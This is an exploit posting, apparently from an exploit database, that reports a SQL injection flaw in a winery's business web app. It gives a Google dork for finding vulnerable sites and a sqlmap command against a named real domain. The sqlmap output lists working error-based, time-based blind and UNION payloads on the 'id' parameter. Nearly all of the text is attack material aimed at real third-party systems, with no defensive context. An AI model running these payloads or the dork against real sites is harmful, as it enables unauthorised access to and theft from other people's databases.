Business Web Apps SQli Vuln.

##################################################
# Exploit Title: Business Web Apps SQli Vuln.
# Google Dork: intitle:"US Elite Winery" inurl:"index.php?id=1"
# Date: 04.06.2017
# Exploit Author: HocaXD
# Version: V.1
# Category: Web Apps
# Tested on: Parrot Security OS / Google Chrome
##################################################
# CVE : sqlmap -u "http://www.uselitewine.com/index.php?id=1'" --dbs
[+]sqlmap identified the following injection point(s) with a total of 2109 HTTP(s) requests:
---
Parameter: id (GET)
    Type: error-based
    Title: MySQL OR error-based - WHERE or HAVING clause (FLOOR)
    Payload: id=-5821 OR 1 GROUP BY CONCAT(0x71717a7a71,(SELECT (CASE WHEN (2431=2431) THEN 1 ELSE 0 END)),0x71706b7071,FLOOR(RAND(0)*2)) HAVING MIN(0)#

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 time-based blind - Parameter replace
    Payload: id=(CASE WHEN (5685=5685) THEN SLEEP(5) ELSE 5685 END)

    Type: UNION query
    Title: MySQL UNION query (random number) - 29 columns
    Payload: id=-4568 UNION ALL SELECT 5100,CONCAT(0x71717a7a71,0x4e676351796443686f764f6a65656f67704a746d6856456c7a4f67504868626361714d47676c5662,0x71706b7071),5100,5100,5100,5100,5100,5100,5100,5100,5100,5100,5100,5100,5100,5100,5100,5100,5100,5100,5100,5100,5100,5100,5100,5100,5100,5100,5100#
---
##################################################